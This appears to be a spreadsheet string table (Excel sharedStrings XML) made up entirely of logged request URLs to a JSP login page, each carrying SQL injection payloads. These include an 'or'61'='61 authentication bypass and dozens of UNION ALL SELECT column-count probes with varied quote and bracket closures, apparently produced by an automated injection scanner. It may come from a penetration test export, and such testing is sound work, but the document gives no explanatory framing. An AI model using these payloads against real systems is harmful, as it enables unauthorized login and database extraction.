    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972,9972--and(("lebs"="lebs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792,3792--and(("cnkc"="cnkc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918--and(("mifu"="mifu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303,9303--and(("pcns"="pcns&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501--and(("niio"="niio&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277,1277--and(("eqxl"="eqxl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178,4178--and(("rfdg"="rfdg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515,515--and((("xgib"="xgib&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415--and((("xthb"="xthb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828,828--and((("zwlm"="zwlm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626,5626--and((("sfbk"="sfbk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482,1482--and((("mtdf"="mtdf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132,8132--and((("xbqj"="xbqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475,7475--and((("msrr"="msrr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731,6731--and((("wtnm"="wtnm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122--and((("jigm"="jigm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783--and((("qvgx"="qvgx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506,4506--and"lmjy"="lmjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869--and"sjno"="sjno&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453,4453--and"wjjo"="wjjo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983,5983--and"hpdi"="hpdi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036,7036--and"zxxd"="zxxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630,5630--and"cdsf"="cdsf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537,8537--and"igvd"="igvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152,7152--and"onek"="onek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831,1831--and"nfmd"="nfmd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135,2135--and"agtj"="agtj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466,7466--and("uxmh"like"uxmh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627,9627--and("vvps"like"vvps&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175,1175--and("jwem"like"jwem&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440,8440--and("fyxj"like"fyxj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361--and("ddgn"like"ddgn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303,2303--and("zttr"like"zttr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394,4394--and("ernp"like"ernp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830--and("knsk"like"knsk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296,6296--and("xnxi"like"xnxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004,3004--and("bawk"like"bawk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616,6616--and(("etav"like"etav&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695,695--and(("dxmy"like"dxmy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952,8952--and(("hwbj"like"hwbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931--and(("kpkw"like"kpkw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992,1992--and(("hvvt"like"hvvt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524,5524--and(("gabx"like"gabx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216,5216--and(("dyni"like"dyni&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462,6462--and(("nhlm"like"nhlm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479,479--and(("illz"like"illz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795--and(("yeqn"like"yeqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206,6206--and((("bwce"like"bwce&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592,3592--and((("jvfn"like"jvfn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952,4952--and((("kvpr"like"kvpr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799--and((("zanj"like"zanj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774--and((("pbwo"like"pbwo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169--and((("sjbe"like"sjbe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539,3539--and((("vofy"like"vofy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014,7014--and((("xtln"like"xtln&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646--and((("rxuu"like"rxuu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565--and((("xetm"like"xetm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577,6577--and"eqvr"like"eqvr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424,7424--and"sduc"like"sduc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386,386--and"nbzl"like"nbzl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376,1376--and"puud"like"puud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077--and"gago"like"gago&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221,7221--and"gltn"like"gltn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540,540--and"wuuz"like"wuuz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697,1697--and"ujbm"like"ujbm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059,3059--and"slyn"like"slyn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739,1739--and"mjtr"like"mjtr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--and(2875=2875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--and(3528=3528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--and(9017=9017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--and(6519=6519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--and(7263=7263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--and(9799=9799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--and(1594=1594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--and(1585=1585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,null--and(9331=9331&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(2189=2189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--and((3316=3316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--and((1091=1091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--and((7727=7727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--and((7249=7249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--and((7758=7758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--and((976=976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,null--and((3699=3699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,null,null--and((9800=9800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,null,null,null--and((7059=7059&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8158=8158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--and(((4514=4514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--and(((7056=7056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--and(((1410=1410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--and(((7669=7669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--and(((9195=9195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--and(((788=788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,null--and(((8890=8890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,null,null--and(((4417=4417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,null,null,null--and(((7645=7645&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((7450=7450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unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--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--and('venz'='venz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--and('crnn'='crnn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--and('jwro'='jwro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--and('cmaj'='cmaj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--and('quyn'='quyn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--and('hpem'='hpem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--and('mced'='mced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--and('iffk'='iffk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--and('tisa'='tisa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,null--and('dbag'='dbag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--and(('jeuv'='jeuv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--and(('tevg'='tevg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--and(('lqsz'='lqsz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--and(('wmue'='wmue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--and(('wcud'='wcud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--and(('yxig'='yxig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--and(('bjgc'='bjgc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--and(('dlhy'='dlhy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,null--and(('oiok'='oiok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,null,null--and(('xwpq'='xwpq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--and((('xjcs'='xjcs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--and((('qixs'='qixs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--and((('zksd'='zksd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--and((('nsnj'='nsnj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--and((('ccwl'='ccwl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--and((('uuld'='uuld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--and((('crjl'='crjl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--and((('sbes'='sbes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,null--and((('uvjq'='uvjq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,null,null--and((('huro'='huro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--and'miuw'='miuw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--and'wzhv'='wzhv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--and'ixyx'='ixyx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--and'bqwj'='bqwj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--and'mhjm'='mhjm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--and'dzmk'='dzmk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--and'gasj'='gasj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--and'jhfm'='jhfm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--and'dhiy'='dhiy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,null--and'hfbg'='hfbg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--and('wnsp'like'wnsp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--and('owok'like'owok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--and('wkbp'like'wkbp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--and('btrz'like'btrz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--and('xcdn'like'xcdn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--and('mfpu'like'mfpu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--and('nufk'like'nufk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--and('oolw'like'oolw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--and('oqnk'like'oqnk&amp;modo=entrar</t>
  </si>
  <si>
